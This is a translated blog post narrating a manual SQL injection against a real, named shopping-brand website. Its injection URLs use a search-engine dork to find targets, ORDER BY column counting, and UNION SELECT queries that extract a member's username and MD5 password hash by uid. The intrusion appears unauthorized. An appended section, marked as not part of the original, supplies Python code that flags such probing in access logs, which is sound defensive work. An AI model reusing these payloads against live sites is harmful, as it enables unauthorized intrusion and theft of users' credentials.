A manual PHP injection (MySQL)

Source: Internet
Author: User

All talk and no practice is just empty show. Reading about script intrusion made me itch to try it, so here is a practice run.


First, Google: inurl:"php?id="

Found this site to inject:

http://brand.66wz.com/store.php?id=18


Next I tried http://brand.66wz.com/store.php?id=18 and user>0.

There was a response; an error message appeared on the page:

[Screenshot: 1.png]


Then I entered:

http://brand.66wz.com/store.php?id=18 and order by 5

Error:

[Screenshot: 2.png]


Following the error message, I used this instead:

http://brand.66wz.com/store.php?id=18 ORDER by 5 DESC LIMIT 0,20

The page loaded normally:

[Screenshot: 5.png]


Then I changed 5 to 30: error.

Changed it to 20: normal.

······

Finally, the critical value is .

[Screenshot: 3.png]

[Screenshot: 4.png]



Then I got the following URL via a Firefox plugin:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From tables



In place of tables I tried a lot of words, such as admin and so on, but none worked.

This is where it should have ended.

But that felt like too much of a pity, so with a let's-give-it-a-try attitude I took a few keywords from the page source and searched Baidu, and found a lot of information related to this site: (http://zhangjianbin.iteye.com/blog/1631387)

Among them are:

Brand_admincp_group: management groups

Brand_admincp_member: administrators

Brand_admincp_perm: administrator privileges

Brand_adminsession: administrator and store-admin login counts and information checks

Brand_members: member information


In the end even the source code turned up: http://code1.okbase.net/codefile/tool.func.php_2012121116304_79.htm


Then I entered:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From Brand_members

[Screenshot: 6.png]


OK! You can insert a field.


The username and MD5-encrypted password are obtained by inserting username and password respectively:

[Screenshot: 7.png]

[Screenshot: 8.png]


So how to match username and password? While scanning with Pangolin I found there is a uid field:

[Screenshot: 9.png]



So just add "where uid=xxxxx" to the URL.

For example:

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,username, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157

[Screenshot: 10.png]

http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,password, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157

[Screenshot: 11.png]


Later, while decrypting the MD5, I found ...

This website's vulnerability had already been reported on WooYun:

http://www.wooyun.org/bugs/wooyun-2010-046524


It's been quite a long time.
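
From the defender's side, the sequence in this write-up (a boolean test, ORDER BY column counting, then UNION SELECT against a named table) is visible in the web server's access log. The following Python code is an added example, not part of the original post; the log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample in combined-log style (assumed format); documentation IP addresses.
SAMPLE_LOG = """\
198.51.100.9 - - [01/Jan/2024:09:58:40 +0000] "GET /store.php?id=18 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /store.php?id=18%20and%20user%3E0 HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2024:10:02:11 +0000] "GET /store.php?id=18+ORDER+by+5+DESC+LIMIT+0,20 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:02:40 +0000] "GET /store.php?id=18+ORDER+by+30+DESC+LIMIT+0,20 HTTP/1.1" 200 790
203.0.113.7 - - [01/Jan/2024:10:03:05 +0000] "GET /store.php?id=18+ORDER+by+20+DESC+LIMIT+0,20 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:09:30 +0000] "GET /store.php?id=18+UNION+SELECT+1,2,3+From+Brand_members HTTP/1.1" 200 5300
"""
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
FROM = re.compile(r"\bfrom\s+(\w+)", re.I)

def classify(value):  # a legitimate `id` value is a plain integer
    if re.fullmatch(r"\d+", value):
        return ("ok", None)
    if m := ORDER_BY.search(value):
        return ("order_by", int(m.group(1)))
    if UNION.search(value):
        t = FROM.search(value)
        return ("union_select", t.group(1) if t else "?")
    return ("non_integer", value)

def analyze(log_text, param="id"):
    """Collect, per client address, every non-integer value sent in `param`."""
    report = defaultdict(lambda: defaultdict(list))
    for line in log_text.splitlines():
        if m := LINE.match(line):
            ip, target = m.groups()
            for value in parse_qs(urlsplit(target).query).get(param, []):
                kind, detail = classify(value)
                if kind != "ok":
                    report[ip][kind].append(detail)
    return {ip: dict(kinds) for ip, kinds in report.items()}

def alerts(report, min_probes=3):
    """Flag ORDER BY column counting (several distinct n) and UNION SELECT reads."""
    out = []
    for ip, kinds in sorted(report.items()):
        probes = sorted(set(kinds.get("order_by", [])))
        if len(probes) >= min_probes:
            out.append((ip, "column-count probing", probes))
        if "union_select" in kinds:
            out.append((ip, "union select", sorted(set(kinds["union_select"]))))
    return out
```

Calling alerts(analyze(SAMPLE_LOG)) reports the one client that walked ORDER BY through 5, 30 and 20 and then named Brand_members; the client that only requested id=18 does not appear.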

This article is from the "7558298" blog, please be sure to keep this source http://7568298.blog.51cto.com/7558298/1576177
